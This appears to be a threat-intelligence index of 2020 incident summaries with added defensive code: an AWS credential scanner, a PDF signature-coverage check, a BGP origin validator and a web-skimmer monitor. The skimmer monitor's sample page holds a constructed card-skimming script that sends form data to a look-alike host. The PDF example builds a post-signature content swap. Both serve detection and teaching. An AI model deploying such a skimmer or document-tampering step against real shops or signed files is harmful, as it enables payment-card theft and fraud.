Threat intelligence
Cyber-attacks against the 2020 US elections - A first analysis
Thursday, November 05, 2020 08:43:00 AM CET
- According to US authorities and security companies, several actors attempted to influence or disrupt the 2020 US presidential elections.
- Four categories of attacks have been identified: influence operations, cyberespionage, cybercrime and hacktivism.
- US authorities took measures such as dismantling attackers' infrastructure, charging or sanctioning individuals or organisations, and sharing technical alerts.
- Public reports allow a first synthetic analysis of the _state of the art_ in election interference risk mitigation.
Thanos ransomware: criminal and disruptive attacks
Tuesday, October 20, 2020 03:25:00 PM CEST
- Thanos is a ransomware-as-a-service offering used by different threat actors.
- A variant was used for financial gain against various victims in Europe in June 2020.
- Another variant was used in the Middle East and North Africa in July 2020.
- Israeli researchers believe that the Iranian state-sponsored threat actor MuddyWater may also have used a variant of Thanos against prominent Israeli entities in September.
US DoJ indicts Russia’s Sandworm threat actor
Tuesday, October 20, 2020 01:14:00 PM CEST
- US authorities charged six members of Russian military intelligence Unit 74455, the threat actor known as Sandworm.
- Sandworm is accused of mostly disruptive cyber operations in Ukraine (electric grid), France (political entities), the UK and the Netherlands (chemical laboratories), Georgia (government, media), South Korea (2018 Winter Olympics) and globally (NotPetya).
- This indictment follows sanctions imposed on the same organisation by the EU in July 2020.
Threat Landscape Report for Q3 2020 - Executive Summary
Monday, October 19, 2020 05:51:00 PM CEST
Direct Threats to EU Institutions, Bodies and Agencies
A cryptomining worm that steals AWS credentials
Wednesday, August 19, 2020 06:01:00 PM CEST
- A new piece of malware targets Amazon Web Services environments and steals AWS credentials from the systems it compromises.
- It then uses these credentials to breach and exploit other cloud-based services for cryptomining.
- Automated cloud attacks are proliferating, largely enabled by insufficient security measures on these services.
Insecure S3 buckets can lead to serial exploitation
Wednesday, August 19, 2020 06:00:00 PM CEST
- Research shows that unsecured cloud storage buckets can be scanned for the presence of credentials.
- The process of harvesting credentials and using them to exploit additional services has the potential to become fully automated.
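The two items above describe the same loop: find credentials lying in reachable storage, then reuse them. The scanner below is an added example (not code from the reports or from the malware) of the first half of that loop, written as a defender would run it against their own bucket contents before an attacker does. It assumes credentials turn up either in AWS's well-known `~/.aws/credentials` INI layout or as environment-variable dumps in logs; the object names and contents are constructed, and the key and secret values are the documented AWS example credentials plus a made-up temporary-key ID, not real secrets.

```python
from __future__ import annotations
import re

# Constructed sample bucket: object key -> object body, as a listing + GET would return.
SAMPLE_OBJECTS = {
    "backups/home/deploy/.aws/credentials": (
        b"[default]\n"
        b"aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        b"aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "logs/ci/build-1234.log": (
        b"[env] AWS_ACCESS_KEY_ID=ASIAZ2FAKE3EXAMPLE00\n"
        b"[env] AWS_SECRET_ACCESS_KEY=bPxRfiCYEXAMPLEKEYwJalrXUtnFEMI/K7MDENG/\n"
        b"[env] AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEJr...\n"
    ),
    "site/index.html": b"<html><body><p>Welcome to the demo shop.</p></body></html>\n",
    # Decoys: 'AKIA' not followed by 16 key characters, and a 40-char hex string
    # that is not labelled as a secret. Neither should be reported.
    "site/assets/app.js": b"var build='AKIAKEY-free build 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b';\n",
}

# Long-term (AKIA) and temporary (ASIA) access key IDs: prefix + 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(rb"(?<![A-Z0-9])(?:AKIA|ASIA)[0-9A-Z]{16}(?![A-Z0-9])")
# Secret keys are 40 base64-ish characters; requiring a label in front keeps
# random hashes and tokens from being reported.
SECRET_KEY_RE = re.compile(
    rb"(?i)(?:aws_)?secret(?:_access)?_?key\s*[=:]\s*['\"]?"
    rb"([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+=])"
)
MAX_SCAN_BYTES = 5 * 1024 * 1024  # assumption: larger objects are binaries/archives, handled separately


def scan_object(key: str, body: bytes) -> list[dict]:
    """Return findings for one object. Secrets are redacted before they leave this function."""
    findings: list[dict] = []
    if len(body) > MAX_SCAN_BYTES:
        return findings
    for m in ACCESS_KEY_RE.finditer(body):
        findings.append({"object": key, "kind": "aws_access_key_id", "value": m.group(0).decode()})
    for m in SECRET_KEY_RE.finditer(body):
        secret = m.group(1).decode()
        findings.append({"object": key, "kind": "aws_secret_access_key",
                         "value": secret[:4] + "..." + secret[-4:]})
    return findings


def scan_bucket(objects: dict[str, bytes]) -> list[dict]:
    findings: list[dict] = []
    for key, body in objects.items():
        findings.extend(scan_object(key, body))
    return findings


def usable_credential_sets(findings: list[dict]) -> set[str]:
    """Objects holding both an access key ID and a secret: directly usable by an attacker."""
    kinds_by_object: dict[str, set[str]] = {}
    for f in findings:
        kinds_by_object.setdefault(f["object"], set()).add(f["kind"])
    return {obj for obj, kinds in kinds_by_object.items()
            if {"aws_access_key_id", "aws_secret_access_key"} <= kinds}


if __name__ == "__main__":
    found = scan_bucket(SAMPLE_OBJECTS)
    for f in found:
        print(f"{f['object']}: {f['kind']} = {f['value']}")
    print("directly usable credential sets:", sorted(usable_credential_sets(found)))
```

Objects that contain both halves of a credential pair are the ones to rotate first; a bare key ID is still worth rotating, since it tells the attacker which account to attack. Redacting in `scan_object` matters because scanner output tends to end up in tickets and chat.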
Threat Landscape Report for Q2 2020 - Executive Summary
Friday, July 31, 2020 04:36:00 PM CEST
Direct Threats to EU Institutions, Bodies and Agencies
Signed PDF documents vulnerable to manipulation
Tuesday, July 28, 2020 03:45:00 PM CEST
Key Points
- 15 of the most widely used PDF viewers are vulnerable to the "Shadow Attack – Hide and Replace", which manipulates documents after they have been signed.
- The attack makes use of hidden layers in the document, invisible to the victim but included in the signed version.
- Adobe, LibreOffice, Foxit and SodaPDF have issued patches for the vulnerability.
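The mechanism behind "Hide and Replace" is that a PDF signature only covers the byte ranges listed in its /ByteRange entry, and the format allows further incremental updates to be appended after those bytes. The check below is an added example, not code from the researchers or any of the vendors: it reads the last /ByteRange in a file and reports how many bytes follow the signed region. The sample document is constructed inline with a dummy /Contents value and without cross-reference tables, so it demonstrates the byte layout only; on a real file the signature itself would still be verified with a PDF library and the signer's certificate.

```python
from __future__ import annotations
import re

BYTE_RANGE_RE = re.compile(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]")
EOF_MARKER = b"%%EOF"


def build_signed_pdf() -> bytes:
    """Constructed minimal 'signed' PDF. /ByteRange [0 a b c] covers everything
    except the /Contents hex string that would hold the PKCS#7 signature."""
    head = (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] /SigFlags 3 >> >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 5 0 R >> endobj\n"
        b"5 0 obj << /Length 42 >> stream\nBT /F1 12 Tf 72 700 Td (Pay EUR 100) Tj ET\nendstream endobj\n"
        b"4 0 obj << /Type /Sig /Filter /Adobe.PPKLite /SubFilter /adbe.pkcs7.detached /ByteRange ["
    )
    contents = b"<" + b"0" * 64 + b">"   # placeholder signature value
    between = b"] /Contents "
    tail = b" >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    br_width = 4 * 10 + 3                # four zero-padded 10-digit fields, three spaces
    contents_start = len(head) + br_width + len(between)
    contents_end = contents_start + len(contents)
    total = contents_end + len(tail)
    byte_range = b"%010d %010d %010d %010d" % (0, contents_start, contents_end, total - contents_end)
    pdf = head + byte_range + between + contents + tail
    assert len(pdf) == total
    return pdf


def append_incremental_update(pdf: bytes) -> bytes:
    """Constructed post-signature update that redefines the page content (the
    'Replace' step). The signed bytes are untouched, so a viewer that checks
    only the ByteRange still reports the signature as valid."""
    update = (
        b"5 0 obj << /Length 43 >> stream\nBT /F1 12 Tf 72 700 Td (Pay EUR 9999) Tj ET\nendstream endobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )
    return pdf + update


def check_signature_coverage(pdf: bytes) -> dict:
    """Report what the last signature's ByteRange covers and what follows it."""
    ranges = BYTE_RANGE_RE.findall(pdf)
    if not ranges:
        return {"signed": False, "unsigned_trailing_bytes": len(pdf), "eof_markers": pdf.count(EOF_MARKER)}
    a, b, c, d = (int(x) for x in ranges[-1])   # later signatures cover earlier ones
    signed_end = c + d
    return {
        "signed": True,
        "covers_from_start": a == 0,
        "signed_bytes": b + d,
        "unsigned_trailing_bytes": len(pdf) - signed_end,
        "eof_markers": pdf.count(EOF_MARKER),
    }


if __name__ == "__main__":
    original = build_signed_pdf()
    tampered = append_incremental_update(original)
    print("original:", check_signature_coverage(original))
    print("tampered:", check_signature_coverage(tampered))
```

A non-zero `unsigned_trailing_bytes` is a reason to inspect the document, not proof of fraud: additional signatures and form fill-ins are also appended as incremental updates. What the patched viewers now do is distinguish harmless updates from ones that change what is rendered; until that can be relied on everywhere, treating any unsigned trailing data as untrusted is the safe policy.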
Largest ever DDoS in PPS against a European bank
Saturday, July 04, 2020 01:02:00 PM CEST
- The largest DDoS attack ever measured in packets per second (PPS) was mitigated by Akamai on June 21.
- The attack peaked at 809 million PPS, more than double the previous PPS record.
- The target was an unnamed European bank.
CERT-EU Cyber Brief - July 2020
Friday, July 03, 2020 11:05:00 AM CEST
Cyber Briefs are monthly executive reports that aim to present an overview of the most relevant developments in cyber security, based exclusively on open sources, with a view to informing political leadership and senior management in CERT-EU's constituency. Additional information on any item in this Brief can be provided upon request. Cyber Briefs are TLP:WHITE.
Largest ever DDoS attack targeted AWS
Thursday, June 18, 2020 04:11:00 PM CEST
- The largest DDoS attack ever recorded targeted AWS in February 2020.
- The attack lasted three days and the traffic peaked at 2.3 Tbps.
- The attack highly likely targeted a single customer but had implications for the whole cloud services provider.
Recent state-sponsored disinformation operations on Twitter
Tuesday, June 16, 2020 12:24:00 PM CEST
- Twitter has discovered distinct state-sponsored disinformation operations originating in China, Russia and Turkey.
- In previous months, countries such as Saudi Arabia, the UAE, Egypt and Ecuador have also engaged in such campaigns.
Ransomware and auctions
Friday, June 05, 2020 11:26:00 AM CEST
- The cybercriminals behind the REvil ransomware are auctioning off sensitive data stolen from their victims.
- Current auction prices range from $50,000 to $200,000.
- The new tactic adopted by REvil operators marks an escalation in methods aimed at coercing victims into paying.
- As with other recently introduced ransomware extortion schemes, it is likely to be adopted by other cybercriminal groups.
CERT-EU Cyber Brief - June 2020
Tuesday, June 02, 2020 07:30:00 PM CEST
Cyber Briefs are monthly executive reports that aim to present an overview of the most relevant developments in cyber security, based exclusively on open sources, with a view to informing political leadership and senior management in CERT-EU's constituency. Additional information on any item in this Brief can be provided upon request. Cyber Briefs are TLP:WHITE.
Massive trading of stolen data
Wednesday, May 13, 2020 10:06:00 AM CEST
- At least 11 digital services companies that suffered breaches in the previous period now see their databases sold on the darknet.
- A single cybercriminal actor claims to be in possession of all the data.
- Microsoft's GitHub account was highly likely also breached by the same threat actor.
Corporate Mobile Device Management system breach
Tuesday, May 12, 2020 09:57:00 AM CEST
- Researchers have discovered a case in which a mobile device management (MDM) system was abused to spread malware to a large number of mobile devices in an enterprise.
- The central role MDMs play in managing mobile devices gives them unique access potential if they are breached.
Threat Landscape Report for Q1 2020 - Executive Summary
Tuesday, April 21, 2020 11:20:00 AM CEST
Direct Threats to EU Institutions, Bodies and Agencies
Children of Mirai
Monday, April 20, 2020 10:49:00 PM CEST
Key Points
- New IoT botnets are building on Mirai's success.
- With new features and persistence methods, these new attack tools are formidable threats.
- Most such botnets are created for financial gain and are highly likely available for hire.
BGP hijacking by Rostelecom
Monday, April 20, 2020 10:47:00 PM CEST
Key Points
- Rostelecom, a large Russian telecom provider, carried out a BGP hijack on April 1.
- BGP hijacks are frequent and often unintentional, but they can also be used to obtain a man-in-the-middle position or to capture traffic for later decryption.
- It is unclear whether this incident was accidental.
- Rostelecom has worked with one of the security firms that reported the incident on resolving it.
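Whether a hijack is accidental or not, the announcement looks the same on the wire: a prefix (often a more-specific one) originated by an AS that is not its legitimate holder. The standard check an operator applies is route origin validation against RPKI ROAs (RFC 6811), which the summary above does not mention. The block below is an added example of that check, not code from any of the parties involved; the ROAs and announcements are constructed from documentation prefixes (RFC 5737, RFC 3849) and documentation ASNs (RFC 5398).

```python
from __future__ import annotations
import ipaddress

# Constructed ROAs: (prefix, maxLength, authorised origin ASN).
SAMPLE_ROAS = [
    ("203.0.113.0/24", 24, 64500),
    ("198.51.100.0/22", 24, 64501),
    ("2001:db8::/32", 48, 64500),
]

# Constructed BGP announcements as (prefix, origin ASN) seen from a collector.
SAMPLE_ANNOUNCEMENTS = [
    ("203.0.113.0/24", 64500),   # legitimate origin
    ("203.0.113.0/25", 64496),   # more-specific from a foreign AS: the classic hijack shape
    ("198.51.100.0/22", 64496),  # covered prefix, wrong origin
    ("192.0.2.0/24", 64497),     # no ROA covers it
]


def rov_state(prefix: str, origin_asn: int, roas) -> str:
    """RFC 6811 outcome for one route: 'valid', 'invalid' or 'not-found'.

    valid:     at least one ROA covers the prefix, its maxLength is not exceeded
               and its ASN equals the origin.
    invalid:   one or more ROAs cover the prefix but none matches.
    not-found: no ROA covers the prefix (unsigned address space).
    """
    net = ipaddress.ip_network(prefix, strict=False)
    covered = False
    for roa_prefix, max_len, asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix, strict=False)
        if roa_net.version != net.version or not net.subnet_of(roa_net):
            continue
        covered = True
        if asn == origin_asn and net.prefixlen <= max_len:
            return "valid"
    return "invalid" if covered else "not-found"


def audit_announcements(announcements, roas) -> list[tuple[str, int, str]]:
    """Classify every announcement; 'invalid' ones are the hijack candidates."""
    return [(prefix, asn, rov_state(prefix, asn, roas)) for prefix, asn in announcements]


if __name__ == "__main__":
    for prefix, asn, state in audit_announcements(SAMPLE_ANNOUNCEMENTS, SAMPLE_ROAS):
        print(f"{prefix:<18} AS{asn:<6} {state}")
```

Routers enforcing ROV drop or de-preference `invalid` routes, which blunts both deliberate and accidental leaks of covered prefixes; `not-found` routes are accepted, which is why publishing ROAs for your own space is the precondition for any of this to help. The more-specific case (`/25` under a `/24` ROA with maxLength 24) is the one worth noting: it is invalid even when announced by the right AS, so maxLength should be set no looser than what is actually announced.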
Cryptomining attacks on Docker systems
Wednesday, April 15, 2020 02:12:00 PM CEST
Key Points
- Insecure instances of the popular Docker container platform are being targeted in a widespread campaign that abuses them for cryptomining.
- The campaign finds unsecured, publicly reachable Docker installations and may also endanger other hosted applications, the hosting server and adjacent systems.
- The case underlines the dangers of inadequate security configurations that result in publicly exposed systems.
COVID-19 monitoring technology
Wednesday, April 15, 2020 02:06:00 PM CEST
Key Points
- According to public reports, at least 33 countries had adopted monitoring technology to curb the COVID-19 pandemic as of April 15, 2020.
- The purpose of this surveillance is to track entire populations or specific categories of people, analyse movements, and detect, diagnose, quarantine or alert individuals at risk.
- Tracking projects were initially started by governments, but technology firms are now proactively designing solutions.
- Efforts to safeguard privacy vary significantly among countries.
Attacks on Elasticsearch databases
Monday, April 06, 2020 04:58:00 PM CEST
Key Points
- The widely used Elasticsearch data aggregation and analysis service is being targeted by an automated campaign.
- The campaign identifies and wipes internet-exposed databases.
- Elasticsearch services have repeatedly been found accessible in the past due to misconfiguration and poor management, exposing troves of data they were supposed to protect.
Mischievous RFC standards – ongoing threat
Wednesday, April 01, 2020 09:24:00 AM CEST
Key Points
- The long-established and well-documented threat actor IETF (aka APT0) is likely to strike globally today.
- Its historical activity of introducing mischievous standards into internet technology borders on the ridiculous.
- Potential victims should scan their mail traffic for so-called RFC documents issued with today's date and delete them immediately.
Attacks on Healthcare
Monday, March 23, 2020 05:38:00 PM CET
- Healthcare organisations are attractive targets for cybercriminals.
- Because of the criticality of their function, they are more likely to give in to cyber-extortion.
- The most prevalent type of attack in the sector is ransomware.
Cookiethief allows for social media account takeover
Tuesday, March 17, 2020 09:24:00 AM CET
Key Points
- A newly discovered malware steals cookies from social network apps such as Facebook.
- The attacker can then completely take over the victim's social network account.
- The malware abuses the trusted relationship between the victim's device and the social network.
- This attack is particularly difficult for the social network to detect.
Coronavirus – Cyber exploitation
Friday, March 06, 2020 02:18:00 PM CET
- Heightened public interest in the coronavirus is spurring cybercriminal and disinformation operations.
- At least six different pieces of malware have been distributed using fraudulent coronavirus-themed emails in several campaigns worldwide.
- At least two likely state-sponsored information operations have been reported.
Credit-card web-skimming infections can last several months
Friday, February 28, 2020 01:00:00 PM CET
- Credit-card web-skimmer infections of e-commerce websites can last several months.
- The lack of security monitoring, and the failure of website owners to react to notifications, constitute a major risk factor.
- Online shops with large audiences typically dedicate more resources to patching security flaws and are therefore likely to be less risky.
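The "lack of security monitoring" above is concrete: a skimmer is a script that was not on the checkout page yesterday, either loaded from a domain the shop does not control or injected inline. The monitor below is an added example (not code from the research) of the check a shop can run against its own pages on a schedule: collect every `<script>` on the page, compare external sources against an origin allowlist, and compare inline bodies against hashes taken from a known-good baseline. The page HTML, domains and injected script are constructed for the example.

```python
from __future__ import annotations
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed known-good checkout page.
BASELINE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-shop.com/lib/forms.js"></script>
<script>window.shopConfig = {currency: "EUR", step: "payment"};</script>
</head><body><form id="checkout"><input name="card"></form></body></html>"""

# Constructed compromised version: a look-alike CDN host plus an inline form hook
# that posts the card fields to the attacker. Everything else is unchanged.
SKIMMED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="https://cdn.example-sh0p.com/lib/jquery.min.js"></script>\n'
    "<script>document.getElementById('checkout').addEventListener('submit',function(e){"
    "new Image().src='https://stats.example-sh0p.com/c?d='+btoa(new URLSearchParams("
    "new FormData(e.target)).toString());});</script>\n</head>",
)

ALLOWED_ORIGINS = {"cdn.example-shop.com"}   # first-party (relative) sources are always allowed


class _ScriptCollector(HTMLParser):
    """Gather external script sources and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_inline = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf).strip())


def _collect(html: str) -> _ScriptCollector:
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p


def baseline_inline_hashes(html: str) -> set[str]:
    """SHA-256 of every inline script in a known-good page; store these, not the page."""
    return {hashlib.sha256(body.encode()).hexdigest() for body in _collect(html).inline}


def audit_page(html: str, allowed_origins: set[str], known_inline_hashes: set[str]) -> list[dict]:
    """Return one finding per script that is not in the allowlist or the baseline."""
    page = _collect(html)
    findings: list[dict] = []
    for src in page.external:
        origin = urlparse(src).netloc.lower()      # empty for relative, first-party sources
        if origin and origin not in allowed_origins:
            findings.append({"type": "unknown-external-script", "detail": src})
    for body in page.inline:
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest not in known_inline_hashes:
            findings.append({"type": "unknown-inline-script", "detail": body[:80]})
    return findings


if __name__ == "__main__":
    known = baseline_inline_hashes(BASELINE_HTML)
    print("baseline:", audit_page(BASELINE_HTML, ALLOWED_ORIGINS, known))
    for f in audit_page(SKIMMED_HTML, ALLOWED_ORIGINS, known):
        print(f"{f['type']}: {f['detail']}")
```

The comparison has to be made on fetched HTML, not on the templates in the repository, because skimmers are typically injected at the server or via a compromised third-party script rather than committed to source. Running it from outside the shop's network, on the real checkout path, is what turns a months-long infection into a same-day alert.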
Russian intelligence officers caught scouting undersea cables
Wednesday, February 26, 2020 12:18:00 PM CET
- Russian agents were seen scouting undersea fibre-optic internet cables arriving at the Irish shore.
- Irish police sources link the agents to the Russian military intelligence service GRU.
- It is currently unclear what their exact goal was.
US indicts Chinese military hackers
Monday, February 24, 2020 12:39:00 PM CET
- The US Department of Justice charged four members of the Chinese People's Liberation Army with conspiracy and hacking.
- Indictments have been a component of the US cyber diplomatic and judicial toolbox since at least 2014.
- In 2019, US technology firms started to enforce the US government's sanctions against selected "foreign adversaries".
State actors targeting mobile phones
Monday, February 24, 2020 12:38:00 PM CET
- The mobile phone of Amazon's CEO was highly likely infected by espionage malware that exfiltrated personal information.
- The infection was highly likely delivered through messages from Saudi Arabia's rulers.
- Likely candidates for the malware used are a number of espionage platforms marketed to governments.
- Mobile devices continue to be seen as valuable sources of personal and financial information by state and criminal actors.
Executive Summary of CERT-EU's Threat Landscape Report 2019Q4
Friday, January 24, 2020 01:50:00 PM CET
- A summary of direct threats to EU institutions, bodies and agencies
- An overview of malware used
- Targeted sectors and sectoral threats
- Geographical threats
Ransomware in the transportation sector
Wednesday, January 22, 2020 01:31:00 PM CET
- Transportation and logistics are particularly attractive to operators of ransomware.
- Ransomware attacks against transportation operators usually correspond to one of the following scenarios: opportunistic criminal infections, hybrid attacks perpetrated by state-sponsored actors, and cybercriminal big game hunting.
Free smartphones for low-income households shipped with malware
Wednesday, January 22, 2020 01:31:00 PM CET
- Free smartphones issued under a welfare programme contained irremovable malware.
- The company issuing the phones has denied that this software is malware, but this is contradicted by public knowledge.
- The inclusion of data leaking malware is on the ri
SHA1 collision attacks shown to be practical
Wednesday, January 22, 2020 01:30:00 PM CET
- New research demonstrates the practicality and affordability of collision attacks against the SHA-1 hash function.
- SHA-1 has been considered unsafe since 2005.
- The new findings are relevant because SHA-1 is still used in multiple applications.
Ransomware now combined with data leakage
Wednesday, January 22, 2020 01:30:00 PM CET
- Ransomware extortion cases have started to include (and carry out) data leakage threats.
- In a number of cases in December 2019 and January 2020, operators of ransomware released victims' internal data.
- The tactic represents an upscaling of ransomware operations in spite of its technical and logistical requirements.
Lazarus Group financial targeting
Wednesday, January 22, 2020 01:28:00 PM CET
- The North Korean threat actor Lazarus Group continues to target financial institutions and cryptocurrencies.
- The goal is likely collecting funds for North Korea.
- Lazarus Group continues to be an important asset for the North Korean regime, both for revenue generation and for technological cyberespionage.
Waves of ransomware in December 2019
Tuesday, January 07, 2020 10:13:00 AM CET
- Several high-profile ransomware attacks were observed in December 2019.
- Public and private organisations in several countries and sectors were affected.
- In two cases, the ransom demand reached $6 million, the highest amount reported so far.
- In two cases, cybercriminals leaked data belonging to their victims in an attempt to force payment of the ransom.
Major cryptocurrency provider compromised in a supply chain attack
Tuesday, January 07, 2020 10:10:00 AM CET
- The official Monero command-line wallet was compromised and used in a supply chain attack.
- At least one person has reported financial loss due to the compromise.
- Cryptocurrency platforms and software are a high-value target for cyber-thieves.